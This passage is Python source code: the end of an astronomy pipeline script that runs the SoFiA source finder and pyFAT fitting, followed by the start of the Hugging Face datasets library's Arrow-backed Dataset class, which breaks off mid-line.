processed_cat[['id', 'ra', 'dec', 'hi_size', 'line_flux_integral', 'central_freq', 'pa', 'i', 'w20']] return processed_cat def prepare_parameters(parameters=param_development_small, type ='debug'): parameters_in = read_sofia_parameters(param_development_small) parameters_in['input.data'] = f'{fitsfile}' parameters_in['output.directory'] = f'{results_path}/{type}' parameters_in['output.filename'] = f'{type}' if not os.path.isdir(results_path): os.mkdir(results_path) write_sofia_parameters(parameters_in, f'{results_path}/sofia_settings.par') def write_sofia_parameters(template,name, debug = False): with open(name,'w') as file: for key in template: if key[0] == 'E' or key [0] == 'H': file.write(template[key]) else: file.write(f"{key} = {template[key]}\n") def read_sofia_parameters(filename,debug = False): with open(filename,'r') as f: template = f.readlines() result = {} counter = 0 counter2 = 0 # Separate the keyword names for line in template: key = str(line.split('=')[0].strip()) if key == '': result[f'EMPTY{counter}'] = line counter += 1 elif key[0] == '#': result[f'HASH{counter2}'] = line counter2 += 1 else: result[key] = str(line.split('=')[1].strip()) return result def organize_sofia(catalog,convert= True, type='debug'): fat_catalog = {'id': ['number'], 'dist': ['Distance'], 'dir': ['Directoryname'], 'cube': ['Cubename']} #sofia_output = ['spec.txt','chan.fits','mom0.fits','mom1.fits','mom2.fits','mask.fits','cube.fits']o sofia_output = ['cube.fits'] for source in catalog['id']: if not os.path.isdir(f'{main_dir}/interim//sofia_{source}'): os.mkdir(f'{main_dir}/interim//sofia_{source}') #Move all sofia out put to a proper directory for file in sofia_output: if convert: convert_frequency_axis(f'{results_path}/{type}/{type}_cubelets/{type}_{source}_{file}',\ f'{main_dir}/interim/sofia_{source}/{type}_{source}_{file}') else: command= f'cp -f {results_path}/{type}/{type}_cubelets/{type}_{source}_{file} {main_dir}/interim/sofia_{source}/{type}_{source}_{file}' os.system(command) fat_catalog['id'].append(source) fat_catalog['dist'].append('-1') fat_catalog['dir'].append(f'sofia_{source}') fat_catalog['cube'].append(f'{type}_{source}_cube') with open(f'{main_dir}/interim/fit_catalogue.txt','w') as f: for i in range(len(fat_catalog['id'])): f.write(f'''{fat_catalog['id'][i]}|{fat_catalog['dist'][i]}|{fat_catalog['dir'][i]}|{fat_catalog['cube'][i]}\n''') def fat_configuration(filename,type='debug'): with open(filename,'r') as f: template = f.readlines() with open(f'{main_dir}/interim/FAT_INPUT.config','w') as f: f.write(f'#This is the configuration file for fit {type} at {datetime.now()} \n') with open(f'{main_dir}/interim/FAT_INPUT.config','a') as f: for line in template: setting = line.split('=')[0].strip() if setting == 'catalogue': line = f'catalogue = {main_dir}/interim/fit_catalogue.txt \n' elif setting == 'maindir': line = f'maindir = {main_dir}/interim/ \n' elif setting == 'outputcatalogue': line = f'outputcatalogue={main_dir}/interim/fat_results.txt \n' elif setting == 'outputlog': line = f'outputlog = log.txt \n' f.write(line) def main(): download_data(data_parameters, type= set_type, force=False) prepare_parameters(parameters=param_development_small, type = set_type) run_sofia(parameters=f'{results_path}/sofia_settings.par', outputdir= set_type) raw_cat = sofia2cat(catalog=os.path.join(results_path, set_type,f'{set_type}_cat.txt')) processed_cat = process_catalog(raw_cat, fitsfile) print(processed_cat) print(f'This catalog is being saved in: {final_cat}') processed_cat['central_freq'] = processed_cat['central_freq'].map('{:.1f}'.format) processed_cat.to_csv(final_cat, sep=' ', index=False) if run_fat: if not os.path.isdir(f'{main_dir}/interim'): os.mkdir(f'{main_dir}/interim') convert = False if 'freq' in raw_cat: convert = True organize_sofia(processed_cat,convert= convert, type=set_type) fat_configuration('./parameters/FAT_INPUT.config',type=set_type) command = f'pyFAT -t -c {main_dir}/interim/FAT_INPUT.config' print(command) os.system(command) if __name__ == "__main__": main()
# coding=utf-8 # Copyright 2020 The HuggingFace Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """ Simple Dataset wrapping an Arrow Table.""" import contextlib import copy import json import os import shutil import tempfile import weakref from collections import Counter, UserDict from collections.abc import Mapping from copy import deepcopy from dataclasses import asdict from functools import partial, wraps from io import BytesIO from math import ceil, floor from pathlib import Path from typing import ( TYPE_CHECKING, Any, BinaryIO, Callable, Dict, Iterable, Iterator, List, Optional, Tuple, Union, overload, ) import fsspec import numpy as np import pandas as pd import pyarrow as pa import pyarrow.compute as pc from huggingface_hub import HfApi, HfFolder from multiprocess import Pool, RLock from requests import HTTPError from tqdm.auto import tqdm from . import config, utils from .arrow_reader import ArrowReader from .arrow_writer import ArrowWriter, OptimizedTypedSequence from .features import ClassLabel, Features, FeatureType, Sequence, Value, _ArrayXD, pandas_types_mapper from .filesystems import extract_path_from_uri, is_remote_filesystem from .fingerprint import ( fingerprint_transform, generate_fingerprint, generate_random_fingerprint, get_temporary_cache_files_directory, is_caching_enabled, maybe_register_dataset_for_temp_dir_deletion, update_fingerprint, ) from .formatting import format_table, get_format_type_from_alias, get_formatter, query_table from .info import DatasetInfo from .search import IndexableMixin from .splits import NamedSplit, Split, SplitInfo from .table import ( InMemoryTable, MemoryMappedTable, Table, cast_with_sliced_list_support, concat_tables, list_table_cache_files, ) from .tasks import TaskTemplate from .utils import logging from .utils.deprecation_utils import deprecated from .utils.file_utils import estimate_dataset_size from .utils.info_utils import is_small_dataset from .utils.py_utils import unique_values from .utils.typing import PathLike if TYPE_CHECKING: from .dataset_dict import DatasetDict logger = logging.get_logger(__name__) class LazyDict(UserDict): def __init__(self, data, features=None, decoding=True): self.data = data self.features = ( {key: feature for key, feature in features.items() if hasattr(feature, "decode_example")} if features else {} ) self.decoding = decoding def values(self): return self.data.values() def items(self): return self.data.items() class Example(LazyDict): def __getitem__(self, key): value = super().__getitem__(key) if self.decoding and self.features and key in self.features: value = self.features[key].decode_example(value) if value is not None else None self[key] = value del self.features[key] return value class Batch(LazyDict): def __getitem__(self, key): values = super().__getitem__(key) if self.decoding and self.features and key in self.features: values = [self.features[key].decode_example(value) if value is not None else None for value in values] self[key] = values del self.features[key] return values class DatasetInfoMixin: """This base class exposes some attributes of DatasetInfo at the base level of the Dataset for easy access. """ def __init__(self, info: DatasetInfo, split: Optional[NamedSplit]): self._info = info self._split = split @property def info(self): """:class:`datasets.DatasetInfo` object containing all the metadata in the dataset.""" return self._info @property def split(self): """:class:`datasets.NamedSplit` object corresponding to a named dataset split.""" return self._split @property def builder_name(self) -> str: return self._info.builder_name @property def citation(self) -> str: return self._info.citation @property def config_name(self) -> str: return self._info.config_name @property def dataset_size(self) -> Optional[int]: return self._info.dataset_size @property def description(self) -> str: return self._info.description @property def download_checksums(self) -> Optional[dict]: return self._info.download_checksums @property def download_size(self) -> Optional[int]: return self._info.download_size @property def features(self) -> Features: return self._info.features @property def homepage(self) -> Optional[str]: return self._info.homepage @property def license(self) -> Optional[str]: return self._info.license @property def size_in_bytes(self) -> Optional[int]: return self._info.size_in_bytes @property def supervised_keys(self): return self._info.supervised_keys @property def task_templates(self): return self._info.task_templates @property def version(self): return self._info.version class TensorflowDatasetMixin: _TF_DATASET_REFS = set() @staticmethod def _get_output_signature(dataset: "Dataset", collate_fn: Callable, collate_fn_args: dict, batch_size: int): """Private method used by `to_tf_dataset()` to find the shapes and dtypes of samples from this dataset after being passed through the collate_fn. Args: dataset (:obj:`Dataset`): Dataset to load samples from. collate_fn(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`): A `dict` of keyword arguments to be passed to the `collate_fn`. batch_size (:obj:`int`): The size of batches loaded from the dataset. Used for shape inference. Returns: :obj:`dict`: Dict mapping column names to tf dtypes :obj:`dict`: Dict mapping column names to tf.TensorSpec objects """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") # Tensorflow needs an exact signature for tf.numpy_function, so # we need to figure out what's coming back in advance. The only way to do this is to run a test batch - # the collator may add columns, so we can't figure it out just by inspecting the dataset. if len(dataset) == 0: raise ValueError("Unable to get the output signature because the dataset is empty.") test_batch_size = min(len(dataset), 4) test_batch = dataset[:test_batch_size] test_batch = [{key: value[i] for key, value in test_batch.items()} for i in range(test_batch_size)] test_batch = collate_fn(test_batch, **collate_fn_args) columns_to_dtypes = {} for key, array in test_batch.items(): # In case the collate_fn returns something strange array = np.array(test_batch[key]) if np.issubdtype(array.dtype, np.integer) or array.dtype == np.bool: cast_dtype = np.int64 elif np.issubdtype(array.dtype, np.number): cast_dtype = np.float32 else: continue # Probably a string, but whatever it is will cause Tensorflow to shit the bed, so drop it columns_to_dtypes[key] = cast_dtype signatures = {} for column, col_feature in dataset.features.items(): if column not in columns_to_dtypes: continue shape = [] shape_feature = col_feature while not isinstance(shape_feature, (Value, ClassLabel)): if isinstance(shape_feature, _ArrayXD): shape.extend(list(shape_feature.shape)) break elif isinstance(shape_feature, Sequence): shape.insert(0, shape_feature.length) shape_feature = shape_feature.feature else: raise ValueError( f"Couldn't parse feature {column} with type {type(col_feature)}! " "This may indicate a column was included with an unusual datatype " "that we were unable to process correctly. " "If you're getting this error with one of our datasets, and you're " "sure the column should be convertable to tf.Tensor, please " "file an issue at github.com/huggingface/datasets and tag " "@rocketknight1." ) shape = [batch_size] + shape shape = [dim if dim != -1 else None for dim in shape] signatures[column] = tf.TensorSpec(shape=shape, dtype=tf.dtypes.as_dtype(columns_to_dtypes[column])) # Catching columns added by the collate_fn, such as MLM labels for column, tensor in test_batch.items(): if column in signatures: continue if column.startswith("label"): if "input_ids" in signatures and test_batch[column].shape == test_batch["input_ids"].shape: shape = signatures["input_ids"].shape else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] signatures[column] = tf.TensorSpec(shape=shape, dtype=tensor.dtype) return columns_to_dtypes, signatures def to_tf_dataset( self, columns: Union[str, List[str]], batch_size: int, shuffle: bool, collate_fn: Callable, drop_remainder: bool = None, collate_fn_args: Dict[str, Any] = None, label_cols: Union[str, List[str]] = None, dummy_labels: bool = False, prefetch: bool = True, ): """Create a tf.data.Dataset from the underlying Dataset. This tf.data.Dataset will load and collate batches from the Dataset, and is suitable for passing to methods like model.fit() or model.predict(). Args: columns (:obj:`List[str]` or :obj:`str`): Dataset column(s) to load in the tf.data.Dataset. In general, only columns that the model can use as input should be included here (numeric data only). batch_size (:obj:`int`): Size of batches to load from the dataset. shuffle(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. drop_remainder(:obj:`bool`, default ``None``): Drop the last incomplete batch when loading. If not provided, defaults to the same setting as shuffle. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`, optional): An optional `dict` of keyword arguments to be passed to the `collate_fn`. label_cols (:obj:`List[str]` or :obj:`str`, default ``None``): Dataset column(s) to load as labels. Note that many models compute loss internally rather than letting Keras do it, in which case it is not necessary to actually pass the labels here, as long as they're in the input `columns`. dummy_labels (:obj:`bool`, default ``False``): If no `label_cols` are set, output an array of "dummy" labels with each batch. This can avoid problems with `fit()` or `train_on_batch()` that expect labels to be a Tensor or np.ndarray, but should (hopefully) not be necessary with our standard train_step(). prefetch (:obj:`bool`, default ``True``): Whether to run the dataloader in a separate thread and maintain a small buffer of batches for training. Improves performance by allowing data to be loaded in the background while the model is training. Returns: :class:`tf.data.Dataset` """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") if collate_fn_args is None: collate_fn_args = {} if label_cols is None: label_cols = [] elif isinstance(label_cols, str): label_cols = [label_cols] elif len(set(label_cols)) < len(label_cols): raise ValueError("List of label_cols contains duplicates.") if not columns: raise ValueError("Need to specify at least one column.") elif isinstance(columns, str): columns = [columns] elif len(set(columns)) < len(columns): raise ValueError("List of columns contains duplicates.") if label_cols is not None: cols_to_retain = columns + label_cols else: cols_to_retain = columns if "label" in cols_to_retain or "labels" in cols_to_retain or "label_ids" in cols_to_retain: cols_to_retain += ["labels", "label", "label_ids"] # Don't accidentally drop any labels with other names! cols_to_retain = list(set(cols_to_retain)) # Remove any duplicates if drop_remainder is None: # We assume that if you're shuffling it's the train set, so we drop the remainder unless told not to drop_remainder = shuffle retained_columns = [key for key in self.features.keys() if key in cols_to_retain] dataset = self.with_format("numpy", columns=retained_columns) columns_to_dtypes, output_signature = self._get_output_signature( dataset, collate_fn, collate_fn_args, batch_size=batch_size if drop_remainder else None ) all_columns = list(columns_to_dtypes.keys()) all_dtypes = list(columns_to_dtypes.values()) def np_get_batch(indices): batch = dataset[indices] actual_size = len(list(batch.values())[0]) # Get the length of one of the arrays, assume all same # Our collators expect a list of dicts, not a dict of lists/arrays, so we invert batch = [{key: value[i] for key, value in batch.items()} for i in range(actual_size)] batch = collate_fn(batch, **collate_fn_args) out_batch = [] for col, cast_dtype in columns_to_dtypes.items(): # In case the collate_fn returns something strange array = np.array(batch[col]) array = array.astype(cast_dtype) out_batch.append(array) return out_batch @tf.function(input_signature=[tf.TensorSpec(None, tf.int64)]) def fetch_function(indices): output = tf.numpy_function( # This works because dictionaries always output in insertion order np_get_batch, inp=[indices], Tout=[tf.dtypes.as_dtype(dtype) for dtype in all_dtypes], ) return {key: output[i] for i, key in enumerate(all_columns)} tf_dataset = tf.data.Dataset.from_tensor_slices(np.arange(len(dataset), dtype=np.int64)) if shuffle: tf_dataset = tf_dataset.shuffle(len(dataset)) def ensure_shapes(input_dict): return {key: tf.ensure_shape(val, output_signature[key].shape) for key, val in input_dict.items()} tf_dataset = tf_dataset.batch(batch_size, drop_remainder=drop_remainder).map(fetch_function).map(ensure_shapes) if label_cols: def split_features_and_labels(input_batch): if "labels" in columns or "label_ids" in columns or "label" in columns: columns.append("labels") if "labels" in label_cols or "label_ids" in label_cols or "label" in label_cols: label_cols.append("labels") # Some data collators add columns, so our logic is that newly added columns should go # into the input dict unless the user asked for them in labels instead features = { key: tensor for key, tensor in input_batch.items() if key in columns or key not in label_cols } labels = {key: tensor for key, tensor in input_batch.items() if key in label_cols} if len(features) == 1: features = list(features.values())[0] if len(labels) == 1: labels = list(labels.values())[0] return features, labels tf_dataset = tf_dataset.map(split_features_and_labels) elif len(columns) == 1: tf_dataset = tf_dataset.map(lambda x: list(x.values())[0]) if dummy_labels and not label_cols: def add_dummy_labels(input_batch): return input_batch, tf.zeros(tf.shape(input_batch[columns[0]])[0]) tf_dataset = tf_dataset.map(add_dummy_labels) if prefetch: tf_dataset = tf_dataset.prefetch(tf.data.experimental.AUTOTUNE) # Remove a reference to the open Arrow file on delete def cleanup_callback(ref): dataset.__del__() self._TF_DATASET_REFS.remove(ref) self._TF_DATASET_REFS.add(weakref.ref(tf_dataset, cleanup_callback)) return tf_dataset class DatasetTransformationNotAllowedError(Exception): pass def transmit_format(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the format of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # don't use self.format since it returns a list of columns for 'columns' even if self_format_columns is None unformatted_columns = set(self.column_names) - set(self._format_columns or []) self_format = { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self._format_columns, "output_all_columns": self._output_all_columns, } # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] # re-apply format to the output for dataset in datasets: new_format = self_format.copy() if new_format["columns"] is not None: # new formatted columns = (columns - previously unformatted columns) # sort the columns to have a deterministic list of columns that we can compare with `out_format` new_format["columns"] = sorted(set(dataset.column_names) - unformatted_columns) out_format = { "type": dataset._format_type, "format_kwargs": dataset._format_kwargs, "columns": sorted(dataset._format_columns) if dataset._format_columns is not None else None, "output_all_columns": dataset._output_all_columns, } if out_format != new_format: # only apply if there's a change not to update the fingerprint for nothing dataset.set_format(**new_format) return out wrapper._decorator_name_ = "transmit_format" return wrapper def transmit_tasks(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the task templates of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] for dataset in datasets: # Remove task templates if a column mapping of the template is no longer valid if self.info.task_templates is not None: dataset.info.task_templates = [ template for template in self.info.task_templates if all(dataset.features.get(k) == self.features.get(k) for k in template.column_mapping.keys()) ] return out wrapper._decorator_name_ = "transmit_tasks" return wrapper def update_metadata_with_features(table: Table, features: Features): """To be used in dataset transforms that modify the features of the dataset, in order to update the features stored in the metadata of its schema.""" features = Features({col_name: features[col_name] for col_name in table.column_names}) if table.schema.metadata is None or "huggingface".encode("utf-8") not in table.schema.metadata: pa_metadata = ArrowWriter._build_metadata(DatasetInfo(features=features)) else: metadata = json.loads(table.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" not in metadata: metadata["info"] = asdict(DatasetInfo(features=features)) else: metadata["info"]["features"] = asdict(DatasetInfo(features=features))["features"] pa_metadata = {"huggingface": json.dumps(metadata)} table = table.replace_schema_metadata(pa_metadata) return table def _check_table(table) -> Table: """We check the table type to make sure it's an instance of :class:`datasets.table.Table`""" if isinstance(table, pa.Table): # for a pyarrow table, we can just consider it as a in-memory table # this is here for backward compatibility return InMemoryTable(table) elif isinstance(table, Table): return table else: raise TypeError(f"Expected a pyarrow.Table or a datasets.table.Table object, but got {table}.") def _check_column_names(column_names: List[str]): """Check the column names to make sure they don't contain duplicates.""" counter = Counter(column_names) if not all(count == 1 for count in counter.values()): duplicated_columns = [col for col in counter if counter[col] > 1] raise ValueError(f"The table can't have duplicated columns but columns {duplicated_columns} are duplicated.") def _check_if_features_can_be_aligned(features_list: List[Features]): """Check if the dictionaries of features can be aligned. Two dictonaries of features can be aligned if the keys they share have the same type or some of them is of type `Value("null")`. """ name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v for features in features_list: for k, v in features.items(): if not (isinstance(v, Value) and v.dtype == "null") and name2feature[k] != v: raise ValueError( f'The features can\'t be aligned because the key {k} of features {features} has unexpected type - {v} (expected either {name2feature[k]} or Value("null").' ) def _align_features(features_list: List[Features]) -> List[Features]: """Align dictionaries of features so that the keys that are found in multiple dictionaries share the same feature.""" name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v return [Features({k: name2feature[k] for k in features.keys()}) for features in features_list] class NonExistentDatasetError(Exception): """Used when we expect the existence of a dataset""" pass class Dataset(DatasetInfoMixin, IndexableMixin, TensorflowDatasetMixin): """A Dataset backed by an Arrow table.""" def __init__( self, arrow_table: Table, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_table: Optional[Table] = None, fingerprint: Optional[str] = None, ): info = info.copy() if info is not None else DatasetInfo() DatasetInfoMixin.__init__(self, info=info, split=split) IndexableMixin.__init__(self) self._data: Table = _check_table(arrow_table) self._indices: Optional[Table] = _check_table(indices_table) if indices_table is not None else None maybe_register_dataset_for_temp_dir_deletion(self) self._format_type: Optional[str] = None self._format_kwargs: dict = {} self._format_columns: Optional[list] = None self._output_all_columns: bool = False self._fingerprint: str = fingerprint # Read metadata if self._data.schema.metadata is not None and "huggingface".encode("utf-8") in self._data.schema.metadata: metadata = json.loads(self._data.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" in metadata and self.info.features is None: # try to load features from the arrow file metadata self._info.features = DatasetInfo.from_dict(metadata["info"]).features if ( "fingerprint" in metadata and self._fingerprint is None ): # try to load fingerprint from the arrow file metadata self._fingerprint = metadata["fingerprint"] # Infer features if None inferred_features = Features.from_arrow_schema(arrow_table.schema) if self.info.features is None: self.info.features = inferred_features else: # make sure the nested columns are in the right order self.info.features = self.info.features.reorder_fields_as(inferred_features) # Infer fingerprint if None if self._fingerprint is None: self._fingerprint = generate_fingerprint(self) # Sanity checks if self.features is None: raise ValueError("Features can't be None in a Dataset object") if self._fingerprint is None: raise ValueError("Fingerprint can't be None in a Dataset object") if self.info.features.type != inferred_features.type: raise ValueError( f"External features info don't match the dataset:\nGot\n{self.info.features}\nwith type\n{self.info.features.type}\n\nbut expected something like\n{inferred_features}\nwith type\n{inferred_features.type}" ) if self._indices is not None: if not pa.types.is_unsigned_integer(self._indices.column(0)[0].type): raise ValueError( f"indices must be an Arrow table of unsigned integers, current type is {self._indices.column(0)[0].type}" ) _check_column_names(self._data.column_names) self._data = update_metadata_with_features(self._data, self.features) @classmethod def from_file( cls, filename: str, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_filename: Optional[str] = None, in_memory: bool = False, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow table at filename. Args: filename (:obj:`str`): File name of the dataset. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_filename (:obj:`str`, optional): File names of the indices. in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. Returns: :class:`Dataset` """ table = ArrowReader.read_table(filename, in_memory=in_memory) if indices_filename is not None: indices_pa_table = ArrowReader.read_table(indices_filename, in_memory=in_memory) else: indices_pa_table = None return cls( arrow_table=table, info=info, split=split, indices_table=indices_pa_table, ) @classmethod def from_buffer( cls, buffer: pa.Buffer, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_buffer: Optional[pa.Buffer] = None, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow buffer. Args: buffer (:obj:`pyarrow.Buffer`): Arrow buffer. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_buffer (:obj:`pyarrow.Buffer`, optional): Indices Arrow buffer. Returns: :class:`Dataset` """ table = InMemoryTable.from_buffer(buffer) if indices_buffer is not None: indices_table = InMemoryTable.from_buffer(buffer) else: indices_table = None return cls(table, info=info, split=split, indices_table=indices_table) @classmethod def from_pandas( cls, df: pd.DataFrame, features: Optional[Features] = None, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, ) -> "Dataset": """ Convert :obj:`pandas.DataFrame` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. The column types in the resulting Arrow Table are inferred from the dtypes of the pandas.Series in the DataFrame. In the case of non-object Series, the NumPy dtype is translated to its Arrow equivalent. In the case of `object`, we need to guess the datatype by looking at the Python objects in this Series. Be aware that Series of the `object` dtype don't carry enough information to always lead to a meaningful Arrow type. In the case that we cannot infer a type, e.g. because the DataFrame is of length 0 or the Series only contains None/nan objects, the type is set to null. This behavior can be avoided by constructing explicit features and passing it to this function. Args: df (:obj:`pandas.DataFrame`): Dataframe that contains the dataset. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features table = InMemoryTable.from_pandas(df=df, schema=pa.schema(features.type) if features is not None else None) return cls(table, info=info, split=split) @classmethod def from_dict( cls, mapping: dict, features: Optional[Features] = None, info: Optional[Any] = None, split: Optional[Any] = None, ) -> "Dataset": """ Convert :obj:`dict` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. Args: mapping (:obj:`Mapping`): Mapping of strings to Arrays or Python lists. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features if features is not None: mapping = features.encode_batch(mapping) mapping = { col: OptimizedTypedSequence(data, type=features.type[col].type if features is not None else None, col=col) for col, data in mapping.items() } pa_table = InMemoryTable.from_pydict(mapping=mapping) return cls(pa_table, info=info, split=split) @staticmethod def from_csv( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from CSV file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the CSV file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :meth:`pandas.read_csv`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetReader return CsvDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() @staticmethod def from_json( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, field: Optional[str] = None, **kwargs, ): """Create Dataset from JSON or JSON Lines file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the JSON or JSON Lines file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. field (:obj:`str`, optional): Field name of the JSON file where the dataset is contained in. **kwargs: Keyword arguments to be passed to :class:`JsonConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetReader return JsonDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, field=field, **kwargs, ).read() @staticmethod def from_parquet( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, columns: Optional[List[str]] = None, **kwargs, ): """Create Dataset from Parquet file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the Parquet file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. columns (:obj:`List[str]`, optional): If not None, only these columns will be read from the file. A column name may be a prefix of a nested field, e.g. 'a' will select 'a.b', 'a.c', and 'a.d.e'. **kwargs: Keyword arguments to be passed to :class:`ParquetConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetReader return ParquetDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, columns=columns, **kwargs, ).read() @staticmethod def from_text( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from text file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the text file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :class:`TextConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.text import TextDatasetReader return TextDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() def __del__(self): if hasattr(self, "_data"): del self._data if hasattr(self, "_indices"): del self._indices def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): # Here `del` is used to del the pyarrow tables. This properly closes the files used for memory mapped tables self.__del__() def save_to_disk(self, dataset_path: str, fs=None): """ Saves a dataset to a dataset directory, or in a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `dataset/train`) or remote URI (e.g. `s3://my-bucket/dataset/train`) of the dataset directory where the dataset will be saved to. fs (:class:`~filesystems.S3FileSystem`, ``fsspec.spec.AbstractFileSystem``, optional, defaults ``None``): Instance of the remote filesystem used to download the files from. """ if self.list_indexes(): raise ValueError("please remove all the indexes using `dataset.drop_index` before saving a dataset") dataset = self.flatten_indices() if self._indices is not None else self if is_remote_filesystem(fs): dataset_path = extract_path_from_uri(dataset_path) else: fs = fsspec.filesystem("file") cache_files_paths = [Path(cache_filename["filename"]) for cache_filename in self.cache_files] # Check that the dataset doesn't overwrite iself. It can cause a permission error on Windows and a segfault on linux. if Path(dataset_path, config.DATASET_ARROW_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_ARROW_FILENAME)} but a dataset can't overwrite itself." ) if Path(dataset_path, 